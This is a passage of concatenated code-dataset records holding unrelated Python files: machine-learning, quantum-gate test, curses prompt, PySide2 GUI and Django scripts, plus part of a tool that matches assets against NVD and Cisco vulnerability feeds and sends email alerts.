label=\"prediction\")\nplt.xlabel(\"Time\")\nplt.ylabel(\"x1\")\nplt.legend(loc=\"upper right\")\nplt.show()","sub_path":"RNN_predict_SP500_and_NASDAQADP_0410.py","file_name":"RNN_predict_SP500_and_NASDAQADP_0410.py","file_ext":"py","file_size_in_byte":3736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"428561090","text":"import math\n\nclass ANG:\n def __init__(self):\n self.ANGC = 0.0\n self.PSCT1=0.0\n self.PSCT2=0.0\n\n def ANGCUT(self):\n self.ANGC=1\n self.PSCT2=self.PSCT1\n if self.PSCT1 <=1:\n return self.ANGC\n API = math.acos(-1)\n RADS = 2/API\n CNS = self.PSCT1-0.5\n THETAC = math.asin(2*math.sqrt(CNS-CNS**2))\n FAC =(1-math.cos(THETAC)/(math.sin(THETAC)**2))\n self.PSCT2 = (CNS*FAC)+0.5\n self.ANGC = THETAC*RADS\n\n","sub_path":"src/Scripts/Python/ANG.py","file_name":"ANG.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"408787428","text":"\"\"\"@file time_anchor_deepattractornet_softmax_reconstructor.py\ncontains the reconstor class using deep attractor network with softmax maskers\"\"\"\n\nimport mask_reconstructor\nimport numpy as np\nimport os\n\n\nclass TimeAnchorReadHeadsDeepattractorSoftmaxReconstructor(mask_reconstructor.MaskReconstructor):\n\t\"\"\"the deepattractor softmax reconstructor class with time-dependent anchors, the read heads decide on the speaker\n\tassignments.\n\n\ta reconstructor using deep attractor netwerk with softmax maskers with time-dependent anchors, the read heads decide\n\t on the speaker assignments\"\"\"\n\trequested_output_names = ['bin_emb', 'anchors', 'read_heads']\n\n\tdef __init__(self, conf, evalconf, dataconf, rec_dir, task, optimal_frame_permutation=False):\n\t\t\"\"\"TimeAnchorDeepattractorSoftmaxReconstructor constructor\n\n\t\tArgs:\n\t\tconf: the reconstructor configuration as a dictionary\n\t\tevalconf: the evaluator configuration as a ConfigParser\n\t\tdataconf: the database configuration\n\t\trec_dir: the directory where the reconstructions will be stored\n\t\ttask: task name\n\t\t\"\"\"\n\n\t\tsuper(TimeAnchorReadHeadsDeepattractorSoftmaxReconstructor, self).__init__(\n\t\t\tconf, evalconf, dataconf, rec_dir, task, optimal_frame_permutation)\n\n\t\tif 'normalize' in conf and conf['normalize'] == 'True':\n\t\t\tself.normalize = True\n\t\telse:\n\t\t\tself.normalize = False\n\n\t\t# # directory where cluster centroids will be stored\n\t\t# self.center_store_dir = os.path.join(rec_dir, 'cluster_centers')\n\t\t# if not os.path.isdir(self.center_store_dir):\n\t\t# \tos.makedirs(self.center_store_dir)\n\n\tdef _get_masks(self, output, utt_info):\n\t\t\"\"\"estimate the masks\n\n\t\tArgs:\n\t\t\toutput: the output of a single utterance of the neural network\n\t\t\t\t\ttensor of dimension [Txfeature_dimension*emb_dim]\n\n\t\tReturns:\n\t\t\tthe estimated masks\"\"\"\n\n\t\tembeddings = output['bin_emb']\n\t\tanchors = output['anchors']\n\t\tread_heads = output['read_heads']\n\n\t\t# Get number of time frames and frequency cells\n\t\tT, out_dim = np.shape(embeddings)\n\t\t# Calculate the used embedding dimension\n\t\temb_dim = np.shape(anchors)[-1]\n\t\tF = out_dim/emb_dim\n\n\t\tif np.shape(embeddings)[0] != T:\n\t\t\traise Exception('Number of frames in embeddings does not match the sequence length')\n\n\t\t# reshape the outputs\n\t\toutput = embeddings[:T, :]\n\t\t# output_resh is a N times emb_dim matrix with the embedding vectors for all cells\n\t\toutput_resh = np.reshape(output, [T, F, emb_dim])\n\t\tif self.normalize:\n\t\t\toutput_resh /= (np.linalg.norm(output_resh, axis=-1, keepdims=True) + 1e-12)\n\n\t\tprod_1 = np.matmul(anchors, np.transpose(output_resh, [0, 2, 1])) # dim: T x nrS x F\n\t\ttmp = np.exp(prod_1)\n\t\tmasks_S = tmp / (np.sum(tmp, axis=1, keepdims=True) + 1e-12)\n\n\t\tmasks_Stot = np.matmul(np.transpose(masks_S, [0, 2, 1]), read_heads) # dim: (T x F x nrSmax)\n\n\t\t# reconstruct the masks from the cluster labels\n\t\tmasks_Stot = np.transpose(masks_Stot, [2, 0, 1])\n\t\t# np.save(os.path.join(self.center_store_dir, utt_info['utt_name']), anchors)\n\t\treturn masks_Stot\n","sub_path":"nabu/postprocessing/reconstructors/time_anchor_read_heads_deepattractornet_softmax_reconstructor.py","file_name":"time_anchor_read_heads_deepattractornet_softmax_reconstructor.py","file_ext":"py","file_size_in_byte":2946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"344773757","text":"import unittest\nfrom math import pi\n\nimport qiskit\nfrom sympy import Symbol\nfrom zquantum.core.circuit._gate import Gate\nfrom zquantum.core.circuit._gateset import COMMON_GATES\nfrom zquantum.core.circuit._qubit import Qubit\n\nPYQUIL_IO_XFAIL = \"U3\"\n\n\nclass TestGate(unittest.TestCase):\n def setUp(self):\n self.two_qubit_gates = [\"CNOT\", \"CZ\", \"CPHASE\", \"SWAP\", \"ISWAP\"]\n self.one_parameter_gates = [\"PHASE\", \"Rx\", \"Ry\", \"Rz\", \"CPHASE\"]\n self.three_parameter_gates = [\"U3\"]\n\n def create_gate(self, gate_name, qubit_indices=[0, 1], params=None):\n if gate_name in self.two_qubit_gates:\n qubit_list = [Qubit(qubit_indices[0]), Qubit(qubit_indices[1])]\n else:\n qubit_list = [Qubit(qubit_indices[0])]\n if params is None:\n params = []\n if gate_name in self.one_parameter_gates:\n params = [1.0]\n if gate_name in self.three_parameter_gates:\n params = [1.0, 2.0, 3.0]\n gate = Gate(gate_name, qubits=qubit_list, params=params)\n return gate\n\n def create_gate_with_symbolic_params(self, gate_name, qubit_indices=[0, 1]):\n if gate_name in self.two_qubit_gates:\n qubit_list = [Qubit(qubit_indices[0]), Qubit(qubit_indices[1])]\n else:\n qubit_list = [Qubit(qubit_indices[0])]\n params = []\n if gate_name in self.one_parameter_gates:\n params = [Symbol(\"theta_0\")]\n gate = Gate(gate_name, qubits=qubit_list, params=params)\n return gate, params\n\n def test_evaluate_works_with_regular_gate(self):\n\n for gate_name in self.one_parameter_gates:\n # Given\n gate = self.create_gate(gate_name)\n symbols_map = [(Symbol(\"theta_0\"), 1.0)]\n\n # When\n evaluated_regular_gate = gate.evaluate(symbols_map)\n\n # Then\n self.assertEqual(evaluated_regular_gate, gate)\n\n def test_evaluate_works_with_symbolic_gate(self):\n\n for gate_name in self.one_parameter_gates:\n # Given\n param_value = 1.0\n gate = self.create_gate(gate_name, params=[param_value])\n symbolic_gate, params = self.create_gate_with_symbolic_params(gate_name)\n symbols_map = [(params[0], param_value)]\n\n # When\n evaluated_symbolic_gate = symbolic_gate.evaluate(symbols_map)\n\n # Then\n self.assertEqual(gate, evaluated_symbolic_gate)\n # Check if the params of the initial gate has not been overwritten\n self.assertEqual(symbolic_gate.params[0], symbols_map[0][0])\n\n # Given\n symbols_map = [(\"x\", 1.0)]\n\n # When\n evaluated_symbolic_gate = symbolic_gate.evaluate(symbols_map)\n\n # Then\n self.assertEqual(evaluated_symbolic_gate, symbolic_gate)\n\n def test_symbolic_params(self):\n\n # Given\n params = [0.5, Symbol(\"theta_0\"), Symbol(\"theta_0\") + 2 * Symbol(\"theta_1\")]\n target_symbolic_params = [\n [],\n [Symbol(\"theta_0\")],\n [Symbol(\"theta_0\"), Symbol(\"theta_1\")],\n ]\n\n for param, target_params in zip(params, target_symbolic_params):\n # Given\n qubit_list = [Qubit(0)]\n gate = Gate(\"Rx\", qubits=qubit_list, params=[param])\n\n # When\n symbolic_params = gate.symbolic_params\n\n # Then\n self.assertEqual(symbolic_params, target_params)\n\n def test_dict_io(self):\n for gate_name in COMMON_GATES:\n # Given\n gate = self.create_gate(gate_name)\n\n # When\n gate_dict = gate.to_dict()\n recreated_gate = Gate.from_dict(gate_dict)\n\n # Then\n self.assertEqual(gate, recreated_gate)\n\n def test_pyquil_io(self):\n for gate_name in COMMON_GATES:\n if gate_name in PYQUIL_IO_XFAIL:\n continue\n\n # Given\n gate = self.create_gate(gate_name)\n\n # When\n pyquil_gate = gate.to_pyquil()\n qubits = [\n Qubit.from_pyquil(pyquil_qubit) for pyquil_qubit in pyquil_gate.qubits\n ]\n\n recreated_gate = Gate.from_pyquil(pyquil_gate, qubits)\n\n # Then\n self.assertEqual(gate, recreated_gate)\n\n def test_cirq_io(self):\n for gate_name in COMMON_GATES:\n # Given\n gate = self.create_gate(gate_name)\n\n # When\n cirq_gate = gate.to_cirq()\n qubits = [\n Qubit.from_cirq(cirq_qubit, cirq_qubit.x)\n for cirq_qubit in cirq_gate.qubits\n ]\n recreated_gate = Gate.from_cirq(cirq_gate, qubits)\n\n # Then\n self.assertEqual(gate, recreated_gate)\n\n def test_qiskit_io(self):\n for gate_name in COMMON_GATES:\n # Given\n gate = self.create_gate(gate_name)\n qreg = qiskit.QuantumRegister(2, \"q\")\n creg = qiskit.ClassicalRegister(2, \"c\")\n\n # When\n qiskit_gate, qreg, creg = gate.to_qiskit(qreg, creg)\n recreated_gate = Gate.from_qiskit(qiskit_gate, gate.qubits)\n\n # Then\n self.assertEqual(gate, recreated_gate)\n\n def test_dict_io_for_symbolic_parameters(self):\n for gate_name in self.one_parameter_gates:\n # Given\n gate, _ = self.create_gate_with_symbolic_params(gate_name)\n\n # When\n gate_dict = gate.to_dict()\n gate_dict_serialized = gate.to_dict(serialize_params=True)\n recreated_gate = Gate.from_dict(gate_dict)\n recreated_gate_from_serialized = Gate.from_dict(gate_dict_serialized)\n\n # Then\n self.assertEqual(gate, recreated_gate)\n self.assertEqual(gate, recreated_gate_from_serialized)\n\n def test_pyquil_io_for_symbolic_parameters(self):\n for gate_name in self.one_parameter_gates:\n # Given\n gate, _ = self.create_gate_with_symbolic_params(gate_name)\n\n # When\n pyquil_gate = gate.to_pyquil()\n qubits = [\n Qubit.from_pyquil(pyquil_qubit) for pyquil_qubit in pyquil_gate.qubits\n ]\n recreated_gate = Gate.from_pyquil(pyquil_gate, qubits)\n\n # Then\n self.assertEqual(gate, recreated_gate)\n\n def test_cirq_io_for_symbolic_parameters(self):\n for gate_name in self.one_parameter_gates:\n for param_value in [-pi, 0, pi / 2, pi, 2 * pi, 0.38553]:\n # Given\n gate, params = self.create_gate_with_symbolic_params(gate_name)\n symbols_map = []\n for param in params:\n symbols_map.append((param, param_value))\n\n # When\n cirq_gate = gate.to_cirq()\n qubits = [\n Qubit.from_cirq(cirq_qubit, cirq_qubit.x)\n for cirq_qubit in cirq_gate.qubits\n ]\n recreated_gate = Gate.from_cirq(cirq_gate, qubits)\n\n recreated_gate = Gate.from_cirq(cirq_gate, qubits)\n gate_evaluated = gate.evaluate(symbols_map)\n recreated_gate_evaluated = recreated_gate.evaluate(symbols_map)\n\n # Then\n # There were numerical & sympy related issues when comparing gates\n # directly, so in this case we compare the evaluated forms of the gates.\n self.assertEqual(gate_evaluated, recreated_gate_evaluated)\n\n def test_qiskit_io_for_symbolic_parameters(self):\n for gate_name in self.one_parameter_gates:\n # Given\n gate, params = self.create_gate_with_symbolic_params(gate_name)\n qreg = qiskit.QuantumRegister(2, \"q\")\n creg = qiskit.ClassicalRegister(2, \"c\")\n\n # When\n qiskit_gate, qreg, creg = gate.to_qiskit(qreg, creg)\n recreated_gate = Gate.from_qiskit(qiskit_gate, gate.qubits)\n\n # Then\n self.assertEqual(gate, recreated_gate)\n","sub_path":"tests/zquantum/core/circuit/_gate_test.py","file_name":"_gate_test.py","file_ext":"py","file_size_in_byte":8135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"512170014","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Apr 3 15:48:47 2017\n\n@author: vinnam\n\"\"\"\n\ndtype = 'float64'\njitter = 1e-6\n\nUCB_a = 1\nUCB_b = 1\nUCB_r = 2\nUCB_delta = 0.1\n\nSIBO_epsilon = 0.01\nSIBO_C2 = 0.01","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"314412951","text":"import mushroom_rl_benchmark.builders\nfrom mushroom_rl_benchmark.builders import EnvironmentBuilder\nfrom mushroom_rl_benchmark.core.experiment import BenchmarkExperiment\nfrom mushroom_rl_benchmark.core.logger import BenchmarkLogger\n\n\nclass BenchmarkSuite:\n \"\"\"\n Class to orchestrate the execution of multiple experiments. \n \"\"\"\n def __init__(self, log_dir=None, log_id=None, use_timestamp=True, **run_params):\n \"\"\"\n Constructor.\n\n Kwargs:\n log_dir (str): path to the log directory (Default: ./logs or /work/scratch/$USER)\n log_id (str): log id (Default: benchmark[_YY-mm-ddTHH:MM:SS.zzz])\n use_timestamp (bool): select if a timestamp should be appended to the log id\n **run_params (dict): parameters that are passed to the run method of the experiment\n \"\"\"\n self.experiment_structure = dict()\n self.environment_list = []\n self.agent_list = []\n self.run_params = run_params\n self.logger = BenchmarkLogger(log_dir=log_dir, log_id=log_id, use_timestamp=use_timestamp)\n\n def add_experiment(self, environment_name, environment_builder_params, agent_name, agent_builder_params):\n \"\"\"\n Add an experiment to the suite.\n\n Args:\n environment_name (str): name of the environment for the experiment (E.g. Gym.Pendulum-v0)\n environment_builder_params (dict): parameters for the environment builder\n agent_name (str): name of the agent for the experiment\n agent_builder_params (dict): parameters for the agent builder\n \"\"\"\n if environment_name in self.environment_list:\n if agent_name in self.experiment_structure[environment_name]:\n raise AttributeError('An experiment for environment {} and builders {} already exists.'.format(environment_name, agent_name))\n else:\n self.experiment_structure[environment_name][agent_name] = self._create_experiment(environment_name, environment_builder_params, agent_name, agent_builder_params)\n else:\n self.environment_list.append(environment_name)\n self.experiment_structure[environment_name] = {agent_name: self._create_experiment(environment_name, environment_builder_params, agent_name, agent_builder_params)}\n \n if agent_name not in self.agent_list:\n self.agent_list.append(agent_name)\n\n def _create_experiment(self, environment, environment_params, agent_name, agent_builder_params):\n separator = '.'\n if separator in environment:\n environment_name, environment_id = environment.split(separator)\n environment_params = dict(\n env_id=environment_id,\n **environment_params)\n environment = environment.replace(separator, '_')\n else:\n environment_name = environment\n\n logger = BenchmarkLogger(\n log_dir=self.logger.get_path(), \n log_id='{}/{}'.format(environment, agent_name),\n use_timestamp=False\n )\n\n try:\n builder = getattr(mushroom_rl_benchmark.builders, '{}Builder'.format(agent_name))\n except AttributeError as e: \n logger.exception(e)\n\n agent_builder = builder.default(**agent_builder_params)\n env_builder = EnvironmentBuilder(environment_name, environment_params)\n\n exp = BenchmarkExperiment(agent_builder, env_builder, logger)\n\n return exp\n\n def print_experiments(self):\n \"\"\"\n Print the experiments in the suite.\n \"\"\"\n for env, agents in self.experiment_structure.items():\n for agent, _ in agents.items():\n self.logger.info('Environment: {}\\tAgent: {}'.format(env, agent))\n\n def run(self, exec_type='sequential'):\n \"\"\"\n Run all experiments in the suite.\n \"\"\"\n for environment, agents in self.experiment_structure.items():\n for agent, exp in agents.items():\n self.logger.info('Starting Experiment for {} on {}'.format(agent, environment))\n exp.run(exec_type=exec_type, **self.run_params)\n","sub_path":"mushroom_rl_benchmark/core/suite.py","file_name":"suite.py","file_ext":"py","file_size_in_byte":4168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"616147066","text":"# -*- coding: utf-8 -*-\n\nimport curses\nimport copy\nfrom .question import Question\n\n\nclass MultiSelect(Question):\n \"\"\"MultiSelect\n\n :param title: a title or None\n :param opt: a list of options\n \"\"\"\n\n def __init__(self, title, opt):\n self.screen = None\n self.title = title\n self.opt = copy.deepcopy(opt) # Don't mutate the argument\n\n self.curr_pos = 0\n\n # Set offset. Offset is how many lines down the options should be printed\n # TODO Handle multi line title\n if self.title:\n self.offset = 1\n else:\n self.offset = 0\n\n def set_screen(self, screen):\n self.screen = screen\n\n def input(self, c):\n if c == \" \":\n self.opt[self.curr_pos][1] = not self.opt[self.curr_pos][1]\n elif c == curses.KEY_UP:\n if self.curr_pos != 0:\n self.curr_pos -= 1\n elif c == curses.KEY_DOWN:\n if self.curr_pos != len(self.opt) - 1:\n self.curr_pos += 1\n\n def renderer(self):\n self.screen.clear()\n\n # Add title\n if self.title:\n self.screen.addstr(0, 0, \" \" + self.title)\n\n # Add all options\n for i, value in enumerate(self.opt):\n self.screen.addstr(i + self.offset, 0, \" [\")\n if value[1]:\n self.screen.addstr(\"✓\", curses.color_pair(1))\n else:\n self.screen.addstr(\" \", curses.color_pair(1))\n self.screen.addstr(\"] \" + value[0])\n # Reverse currently selected box\n if self.opt[self.curr_pos][1]:\n self.screen.chgat(self.curr_pos + self.offset, 2, 1, curses.color_pair(1) | curses.A_REVERSE)\n else:\n self.screen.chgat(self.curr_pos + self.offset, 2, 1, curses.A_REVERSE)\n\n def answer(self):\n return self.opt\n\n\nclass Select(Question):\n \"\"\"Select\n\n :param title: a title or None\n :param opt: a list of options\n :param selected: pre-selected option\n \"\"\"\n\n def __init__(self, title, opt, selected=0):\n self.screen = None\n self.title = title\n self.opt = opt\n\n self.curr_pos = min(selected, len(opt)-1)\n\n # Set offset. Offset is how many lines down the options should be printed\n if self.title:\n self.offset = 1\n else:\n self.offset = 0\n\n def set_screen(self, screen):\n self.screen = screen\n\n def input(self, c):\n if c == curses.KEY_UP:\n if self.curr_pos != 0:\n self.curr_pos -= 1\n elif c == curses.KEY_DOWN:\n if self.curr_pos != len(self.opt) - 1:\n self.curr_pos += 1\n\n def renderer(self):\n self.screen.clear()\n\n # Add title\n if self.title:\n self.screen.addstr(0, 0, \" \" + self.title)\n\n # Add all options\n for i, value in enumerate(self.opt):\n self.screen.addstr(i + self.offset, 0, \" \")\n if i == self.curr_pos:\n self.screen.addstr(value, curses.A_REVERSE)\n else:\n self.screen.addstr(value)\n\n def answer(self):\n return self.opt[self.curr_pos]\n\n\nclass Text(Question):\n\n def __init__(self, text, prompt, is_password):\n self.screen = None\n self.text = text\n self.prompt = prompt\n self.data = \"\"\n self.is_password = is_password\n\n if self.text is None:\n self.offset = 0\n else:\n self.offset = 1\n\n def set_screen(self, screen):\n self.screen = screen\n\n def input(self, c):\n if c == curses.KEY_BACKSPACE:\n self.data = self.data[:-1]\n elif type(c) is str:\n self.data = self.data + c\n\n def renderer(self):\n self.screen.clear()\n curses.curs_set(True)\n\n if self.text is not None:\n self.screen.addstr(0, 0, \" \" + self.text)\n\n self.screen.addstr(self.offset, 0, \" \")\n if self.is_password:\n self.screen.addstr(self.prompt + \": \")\n else:\n self.screen.addstr(self.prompt + \": \" + self.data)\n\n def answer(self):\n curses.curs_set(False)\n return self.data\n\n\nclass YesNo(Question):\n \"\"\"YesNo\n\n :param prompt: a question\n :param default: pre-selected value; True or False for yes or no respectively\n \"\"\"\n\n def __init__(self, prompt, default=False):\n self.screen = None\n self.prompt = prompt\n self.res = default\n\n def set_screen(self, screen):\n self.screen = screen\n\n def input(self, c):\n if c == curses.KEY_LEFT:\n self.res = True\n elif c == curses.KEY_RIGHT:\n self.res = False\n\n def renderer(self):\n self.screen.clear()\n\n self.screen.addstr(0, 0, \" \" + self.prompt + \": \")\n\n if self.res:\n self.screen.addstr(\"Yes\", curses.color_pair(1) | curses.A_REVERSE)\n self.screen.addstr(\" \")\n self.screen.addstr(\"No\", curses.color_pair(2))\n else:\n self.screen.addstr(\"Yes\", curses.color_pair(1))\n self.screen.addstr(\" \")\n self.screen.addstr(\"No\", curses.color_pair(2) | curses.A_REVERSE)\n\n def answer(self):\n return self.res\n\n\nclass Print(Question):\n \"\"\"Print\n \n :param text: text to print\n \"\"\"\n\n def __init__(self, text):\n self.screen = None\n self.text = text\n\n def set_screen(self, screen):\n self.screen = screen\n\n def input(self, c):\n pass\n\n def renderer(self):\n self.screen.clear()\n\n self.screen.addstr(0, 0, \" \" + self.text)\n\n def answer(self):\n return None\n","sub_path":"cursesinquirer/builtins.py","file_name":"builtins.py","file_ext":"py","file_size_in_byte":5634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"26506488","text":"import sys\nfrom PySide2.QtWidgets import QApplication, QMainWindow,QLabel, QPushButton, QAction\nfrom PySide2.QtGui import QIcon, QPixmap, QFont\nfrom PySide2.QtCore import QSize\nimport requests\n\nclass ShowDenWindow(QMainWindow):\n def __init__(self):\n super().__init__()\n self.setWindowTitle(\"RaidBattle-Den\")\n self._width = 750\n self._height = 750\n self.setFixedSize(self._width, self._height)\n self.initUI()\n self.creat_menu()\n\n self.setIcon()\n # self.setIconModes()\n\n def initUI(self):\n # url = \"https://www.serebii.net/swordshield/pokemon/113.png\"\n # response = requests.get(url,headers={\n # \"User-Agent\":\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36\"\n # })\n # img_data = response.content\n # pixmap = QPixmap()\n # pixmap.loadFromData(img_data)\n # scaled = pixmap.scaled(QSize(100,100))\n # piclabel = QLabel(self)\n # piclabel.setGeometry(0,22,120,120)\n # piclabel.setPixmap(scaled)\n\n qlabel1 = QLabel('PySide2 is Great', self)\n qlabel1.setGeometry(10,10,100,40)\n\n exit_btn = QPushButton('返回', self)\n exit_btn.setGeometry(10,70,100,40)\n\n\n \n\n\n\n #建立menubar\n def creat_menu(self):\n mainmenu = self.menuBar()\n filemenu = mainmenu.addMenu(\"File\")\n\n #程式執行時最左邊的Icon\n def setIcon(self):\n appIcon = QIcon(\"pic.ico\")\n self.setWindowIcon(appIcon)\n\n def setgosubButton(self,ButtonName, ButtonText, ButtonX, ButtonY):\n font = QFont()\n font.setFamily('新細明體')\n font.setPointSize(10)\n font.setBold(True)\n ButtonName = QPushButton(ButtonText, self)\n ButtonName.setGeometry(ButtonX,ButtonY,90,26)\n ButtonName.setFont(font)\n ButtonName.setStyleSheet('QPushButton {background-color: #febc0a}')\n # ButtonName.clicked.connect(self.gotoSub)\n\n # def gotoSub(self):\n # self.goSub = goSub\n\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n\n window = ShowDenWindow()\n window.show()\n\n sys.exit(app.exec_())\n","sub_path":"Main/Sub_ShowDen.py","file_name":"Sub_ShowDen.py","file_ext":"py","file_size_in_byte":2208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"616602987","text":"import os\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'pro.settings')\n\nimport django\ndjango.setup()\n\n# fake def\nimport random\nfrom fa.models import AccessRecord , Webpage , Topic\nfrom faker import Faker\n\nfakegen = Faker()\ntopics = ['search', 'social', 'market place', 'news','games']\n\ndef add_topic():\n t = Topic.objects.get_or_create(top_name = random.choice(topics))[0]\n t.save()\n return t\n\n\ndef pop(N=5):\n\n for entry in range(N):\n top = add_topic()\n\n fake_url = fakegen.url()\n fake_date = fakegen.date_time()\n fake_name = fakegen.company()\n\n webpg = Webpage.objects.get_or_create(topic=top,url=fake_url,name=fake_name)[0]\n acc_rec = AccessRecord.objects.get_or_create(name=webpg , date=fake_date)[0]\n\n\nif __name__ == '__main__':\n print(\"poulate data\")\n pop(40)\n print(\"completed\")\n","sub_path":"pro/pop.py","file_name":"pop.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"163186496","text":"\"\"\"The main entrypoint to vulnture.\"\"\"\n\nimport argparse\nimport configparser\nimport json\nimport logging\nfrom pathlib import Path\nimport sys\nfrom time import gmtime\n\nfrom project.modules.models import Asset, EmailNotification, VulnerabilitySource\nfrom project.plugins.assets import dynamodb\nfrom project.plugins.vulnfeeds import cisco_advisories, nvd_feed\n\n# Parse args\nparser = argparse.ArgumentParser(description='Kick off the various'\n' components of the vulnerability notification tool.')\nparser.add_argument('--table-name', help='DynamoDB table name')\nparser.add_argument('--vendor-key', help='DynamoDB vendor column name (key)')\nparser.add_argument('--product-key', help='DynamoDB product column name (key)')\nparser.add_argument('--test', action='store_true',\n help='Test with input data rather than asset DB')\nparser.add_argument('-v', '--verbose', action='count',\n help='Set the verbosity level (More v\\'s = higher verbosity)')\nargs = parser.parse_args()\n\n\ndef get_notifications(config):\n \"\"\"Checks conf.ini for enabled notifications.\n\n Parameters\n ----------\n config : configparser.ConfigParser\n An instantiated ConfigParser referring to conf/conf.ini\n\n Returns\n -------\n set\n A set of Notification subclasses representing enabled notifications\n \"\"\"\n logger = logging.getLogger()\n # Set to store all configured Notifications - in the future can use DB and\n # web GUI instead - for now, updating notification settings requires\n # modifying conf.ini before each runtime\n configured_notifications = set()\n try:\n notifications = config['Notifications']\n except KeyError as KE:\n sys.exit('Failed to parse config section {}!'.format(KE))\n # Check if email notifications enabled\n if notifications.getboolean('email'):\n try:\n email_recipients = json.loads(notifications['EmailRecipients'])\n except KeyError as KE:\n sys.exit('Email notifications enabled, but no recipients set!')\n # ignores numbers (e.g. 1, 2) in keys and just get values we need\n for value in email_recipients.values():\n # list of email recipients\n recipients = value['recipients'].split(',')\n if 'selectors' in value:\n # list of selectors\n selectors = value['selectors'].split(',')\n else:\n # None implies send everything (no limitations)\n selectors = None\n smtp_server = notifications['SMTPServer']\n sender = notifications['SMTPSender']\n configured_notifications.add(\n EmailNotification(\n smtp_server=smtp_server,\n sender=sender,\n recipients=recipients,\n selectors=selectors\n )\n )\n return configured_notifications\n\n\ndef get_assets(config):\n \"\"\"Checks conf.ini for enabled asset backends and ingests discovered\n assets.\n\n Parameters\n ----------\n config : configparser.ConfigParser\n An instantiated ConfigParser referring to conf/conf.ini\n\n Returns\n -------\n set\n A set of Asset objects representing discovered assets\n \"\"\"\n logger = logging.getLogger()\n # Set to store all discovered Assets - in the future can use DB and web\n # GUI instead\n discovered_assets = set()\n # Check for configured backend(s) - only one initially, multiple in\n # future release\n try:\n asset_backends = config['Asset Backends']\n except KeyError as KE:\n sys.exit('Failed to parse config section {}!'.format(KE))\n if asset_backends.getboolean('dynamodb'):\n # Get all assets from DynamoDB table and create Asset objects\n logger.debug('Searching DynamoDB for assets...')\n asset_set = dynamodb.retrieve_assets(\n args.table_name, args.vendor_key, args.product_key)\n for asset in asset_set:\n # Get vendor and product names by splitting on colon\n asset_values = asset.split(':')\n vendor_name = asset_values[0]\n raw_product_name = asset_values[1]\n product = asset_values[2]\n # NOTE: A bug will arise if any product names contain a pipe (|)!\n # Get product name and keyword by splitting on pipe\n product_keyword_values = product.split('|')\n normalized_product_name = product_keyword_values[0]\n # Check in case dynamodb.get_keywords() returned None\n if len(product_keyword_values) > 1:\n # keyword is used exclusively to search for false positives in\n # Cisco vuln feed\n # TODO: Find a clean way to seperate this Cisco vuln specific\n # field from Asset creation\n keyword = product_keyword_values[1]\n if keyword == 'keyword':\n keyword = normalized_product_name\n else:\n # Use product name as keyword if get_keywords() yields None\n keyword = normalized_product_name\n discovered_assets.add(\n Asset(\n vendor=vendor_name,\n product=normalized_product_name,\n raw_name=raw_product_name,\n keywords=keyword)\n )\n return discovered_assets\n\n\ndef get_vulnerability_sources(config):\n \"\"\"Checks conf.ini for sources of vulnerability alerts.\n\n Parameters\n ----------\n config : configparser.ConfigParser\n An instantiated ConfigParser referring to conf/conf.ini\n\n Returns\n -------\n set\n A set of VulnerabilitySource objects representing configured\n vulnerability alert sources\n \"\"\"\n logger = logging.getLogger()\n configured_vulnerability_sources = set()\n try:\n vulnerability_sources = config['Vulnerability Data Sources']\n except KeyError as KE:\n sys.exit('Failed to parse config section {}!'.format(KE))\n # Check if Cisco security advisories and alerts service enabled\n if vulnerability_sources.getboolean('Cisco'):\n configured_vulnerability_sources.add(\n VulnerabilitySource(\n applicable_vendors='Cisco',\n url='https://tools.cisco.com/security/center/publicationService.x'\n )\n )\n # Check if NVD feed enabled\n if vulnerability_sources.getboolean('NVD'):\n configured_vulnerability_sources.add(\n VulnerabilitySource(\n applicable_vendors='all',\n url='https://nvd.nist.gov/feeds/json/cve/1.0/nvdcve-1.0-modified.json.gz'\n )\n )\n return configured_vulnerability_sources\n\n\ndef get_vulnerabilities(config, assets):\n \"\"\"Searches configured vulnerability data sources for vulnerabilities\n related to discovered assets.\n\n Parameters\n ----------\n config : configparser.ConfigParser\n An instantiated ConfigParser referring to conf/conf.ini\n assets : set(Asset)\n A set of Asset objects representing discovered assets\n\n Returns\n -------\n set\n A set of Vulnerability objects representing asset vulnerabilities\n \"\"\"\n logger = logging.getLogger()\n detected_vulnerabilities = set()\n # TODO: this will eventually be removed and only kept in \n # get_vulnerability_sources once moving to fully object oriented\n try:\n vulnerability_sources = config['Vulnerability Data Sources']\n except KeyError as KE:\n sys.exit('Failed to parse config section {}!'.format(KE))\n # Check if Cisco security advisories and alerts service enabled\n if vulnerability_sources.getboolean('Cisco'):\n # Create dict to act as cache of normalized product names searched\n # paired to Vulnerabilities (set) returned in search\n search_cache = {}\n # Check only Cisco products\n logger.debug('Searching Cisco security advisories and alerts...')\n for asset in assets:\n if asset.vendor.lower() == 'cisco':\n # Cisco vuln feed should be searched once per product\n cisco_advisories.search(\n asset, search_cache, detected_vulnerabilities\n )\n # Check if NVD feed enabled\n if vulnerability_sources.getboolean('NVD'):\n # Check products by all vendors\n # NVD feed should be downloaded once, then queried once per product\n logger.debug('Searching recently modified NVD vulnerabilities...')\n nvd_feed.search(assets, detected_vulnerabilities)\n return detected_vulnerabilities\n\n\n# Parameters event and context are sent by the AWS Lambda service\ndef handler(event, context):\n # Remove AWS Lambda root logger handler\n logger = logging.getLogger()\n if logger.handlers:\n for handler in logger.handlers:\n 